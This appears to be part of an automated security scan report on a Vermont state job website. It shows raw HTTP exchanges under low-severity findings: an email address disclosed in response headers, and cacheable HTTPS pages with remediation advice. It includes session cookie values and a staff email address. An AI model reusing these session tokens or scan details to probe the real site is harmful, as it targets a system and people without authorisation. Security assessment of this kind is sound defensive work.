HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:51 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) server-error: true Content-Type: text/html; charset=UTF-8 Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Bookmark Error <b>You may be seeing this error as a result of bookmarking this page. Unfortunately, our site design will not allow the bookmarking of most internal pages.</b> If you wish to contact th ...[SNIP]... <a href="mailto:vjl@state.vt.us">vjl@state.vt.us</a> ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/works/resourcesoverview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:50 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /favicon.ico HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 29 Apr 2011 21:07:34 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ location: /ada/404/404_qry.cfm Content-Type: text/html; charset=UTF-8
<!-- vermontjoblink --><!-- vjlpub --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->
8. Cacheable HTTPS responsepreviousnext There are 22 instances of this issue:
Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.
Issue remediation
The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:
GET /ada/404/404_qry.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:07:01 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
GET /ada/customization/Vermont/documents/eeoislaw.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
GET /ada/customization/Vermont/documents/privacy.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:52 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
GET /ada/global/style/cfmstyle.css HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:12:02 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) server-error: true Last-Modified: Tue, 15 Nov 2000 12:45:26 GMT Content-Type: text/css
We're sorry, but a fatal error has occurred (no client variables).
GET /ada/leavesite.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:51 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
GET /ada/mn_eligibility_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
GET /ada/mn_forgotpass.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:07:29 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
GET /ada/mn_offices_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:58 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
GET /ada/mn_protectyourself_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
